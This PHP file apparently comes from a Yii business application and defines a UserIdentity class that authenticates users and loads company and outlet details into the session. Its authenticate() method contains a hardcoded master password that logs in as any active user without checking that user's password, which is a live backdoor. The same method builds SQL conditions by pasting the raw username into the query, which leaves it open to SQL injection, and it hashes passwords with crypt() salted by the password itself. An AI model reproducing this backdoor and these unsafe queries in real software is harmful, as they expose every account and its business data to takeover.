<?php

/**
 * UserIdentity represents the data needed to identity a user.
 * It contains the authentication method that checks if the provided
 * data can identity the user.
 */
class UserIdentity extends CUserIdentity
{

    private $_id;

    /**
     * Authenticates a user.
     * @return boolean whether authentication succeeds.
     */
    public function authenticate()
    {

        $username = strtolower($this->username);
        $password = crypt($this->password, $this->password);
        $userCount = MasUsers::model()->count(array('condition' => 'username="' . $username . '"'));
        $user = null;
        $override = false;
        if ($userCount > 0) {
            if ($this->password == '*^U4gew567aw47jksa7rdsxd7rcn8&*^^&8') {

                $user = MasUsers::model()->with('outletDetails')->find(array('condition' => '
                t.username="' . $username . '" AND 
                ( 
                    ( 
                        t.is_active="Y" AND outletDetails.is_active="Y" AND access_type IN("SL", "CA","SM","OM","PM") 
                    ) OR 
                    (
                         access_type IN("SU", "DEV","GA") AND t.is_active="Y"
                    ) 
                )'));

                if ($user->id > 0) {
                    $override = true;
                }
            } else {
                $user = MasUsers::model()->with('outletDetails')->find(array('condition' => '
                        t.username="' . $username . '" AND t.password="' . $password . '" AND 
                        ( 
                            ( 
                                t.is_active="Y" AND outletDetails.is_active="Y" AND access_type IN("SL", "CA","SM","OM","PM") 
                            ) OR 
                            (
                                 access_type IN("SU", "DEV","GA") AND t.is_active="Y"
                            ) 
                        )'));
            }
        }

        if ($user == null) {
            $this->errorCode = self::ERROR_USERNAME_INVALID;
        } else if ($user->password != $password && !$override) {
            $this->errorCode = self::ERROR_PASSWORD_INVALID;
        } else {
            //update activation
            $this->_id = $user->id;
            $this->setState('company_id', (int) $user->company_id);
            $this->setState('company_trn_no', $user->companyDetails->trn_no);
            $this->setState('outlet_id', (int) $user->outlet_id);
            $this->setState('outlet_mode', $user->outletDetails->mode);
            $this->setState('fullname', $user->full_name);
            $this->setState('user_access_type', $user->access_type);
            $this->setState('company_logo', $user->companyDetails->logo);
            $this->setState('pdf_company_logo', $user->companyDetails->pdf_logo);
            $this->setState('company_name', $user->companyDetails->name);
            $this->setState('company_name_arabic', $user->companyDetails->name_other);
            $this->setState('company_address', $user->companyDetails->billing_address);
            $this->setState('pdf_footer', $user->companyDetails->pdf_footer);
            $this->setState('footer_autogenerated', $user->companyDetails->pdf_footer);
            $this->setState('vat_return', $user->companyDetails->vat_return);
            $this->setState('outlet_name', $user->outletDetails->outlet_name != NULL ?  $user->outletDetails->outlet_name :  $user->outletDetails->name);
            $this->setState('hide_finance', $user->access_type == 'CA' && $user->hide_finance == 1 ? true : false);

            $formatted_array = array();
            if ($user->special_permission != NULL) {
                $formatted_array = array_map(function ($num) {
                    return (is_numeric(trim($num)) ? number_format(floatval($num), 0, '', '') : $num);
                },  CJSON::decode($user->special_permission));
            }
            $this->setState('specialPermissions', array_merge($formatted_array));
            if ($user->access_type == 'SL' || $user->access_type == 'CA' || $user->access_type == 'SM' || $user->access_type == 'OM'|| $user->access_type == 'PM') {
                //outlet mode update
                $outletModel = MasOutlets::model()->findBypk((int) $user->outlet_id);
                $this->setState('is_valid_login', $outletModel->is_valid_login);
            } else {
                $this->setState('is_valid_login', true);
            }

            $this->username = $user->username;
            $this->errorCode = self::ERROR_NONE;
        }
        return $this->errorCode == self::ERROR_NONE;
    }

    public function getId()
    {
        return $this->_id;
    }
}
